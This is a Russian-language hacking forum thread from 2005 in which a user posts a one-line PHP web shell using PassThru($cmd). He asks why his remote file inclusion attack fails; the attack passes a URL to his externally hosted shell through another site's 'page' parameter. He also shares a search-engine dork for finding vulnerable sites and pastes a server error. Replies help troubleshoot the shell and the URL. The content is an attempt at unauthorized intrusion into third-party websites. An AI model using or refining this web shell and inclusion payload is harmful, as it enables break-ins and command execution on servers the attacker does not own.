HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

shel.php
  #1  
Старый 25.05.2005, 23:30
x32ph
Новичок
Регистрация: 12.03.2005
Сообщений: 2
С нами: 11138093

Репутация: 0
По умолчанию shel.php

Здрасьте, sorry, что пишу не по теме, но! У меня есть файл с шелом на .народ.ру вот содержимое этого сайта
<?php echo "<pre>" ; PassThru($cmd) ; echo "</pre>"; echo "<?php echo "<pre>" ; PassThru($cmd) ; echo "</pre>"; echo "php shell by 310003102 haked by x32ph" ?> " ?>
По идее если сайт бажный, то он мне должен выдать
php shell by 310003102 haked by x32ph так вот, он мне выдает все это дело. Я пишу в адресной строке: http://www.XXX.xxx/index.php?page=ht....XXX.narod.ru/
shel.php&cmd=pwd почему он не выдает мне мои правыа??? Что я не так делаю?
 
Ответить с цитированием

  #2  
Старый 25.05.2005, 23:35
x32ph
Новичок
Регистрация: 12.03.2005
Сообщений: 2
С нами: 11138093

Репутация: 0
По умолчанию

Да, и еще! В поисковике я пишу allinurl: "index.php?page=news.php" что не так???
 
Ответить с цитированием

  #3  
Старый 25.05.2005, 23:41
x32ph
Новичок
Регистрация: 12.03.2005
Сообщений: 2
С нами: 11138093

Репутация: 0
По умолчанию

Вот на такой запрос /index.php?page=http://www.***.narod.ru/shel.php;&cmd=id
он мне выдал Warning: main(): Failed opening 'http://www.x32ph.narod.ru/666.php;' for inclusion (include_path='.') in /home/htdocs/web12/html/kerken/index.php on line 38
 
Ответить с цитированием

  #4  
Старый 25.05.2005, 23:45
Xalegi
Участник форума
Регистрация: 24.11.2004
Сообщений: 126
С нами: 11294246

Репутация: 11
По умолчанию

тсареешь =)) в гугле уже дааавно это всё пофиксили, терь этим не воспользуешься... это раз...
по поводу шела.. ты тооочно уверен, что возможно Sql-инъекция?
+ у тя ошибка в самом шеле...
+ он тебе НЕ выдаст то, что ты хочешь.. хакед бай Вася Пупкин... так как ты задаёшь ему параметр пвд.. он те теоретически должен выдать путь к тому, где находится данная страница, на которой ты выполняешь шелл-команды...

вроде всё так... могу ошибатся


ЗЫ: haCked пишется с буквой "с" =)
 
Ответить с цитированием

  #5  
Старый 26.05.2005, 00:23
x32ph
Новичок
Регистрация: 12.03.2005
Сообщений: 2
С нами: 11138093

Репутация: 0
По умолчанию

Эй, люди, подскажите тогда какой поисковит юзать! Да и че в шеле не так???
 
Ответить с цитированием

  #6  
Старый 26.05.2005, 21:52
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию

а я не понял почему ты после shel.php пишешь знак & , а не ?
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #7  
Старый 27.05.2005, 17:51
x32ph
Новичок
Регистрация: 12.03.2005
Сообщений: 2
С нами: 11138093

Репутация: 0
По умолчанию

А какая собственно разница & - так тож работает -)))
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.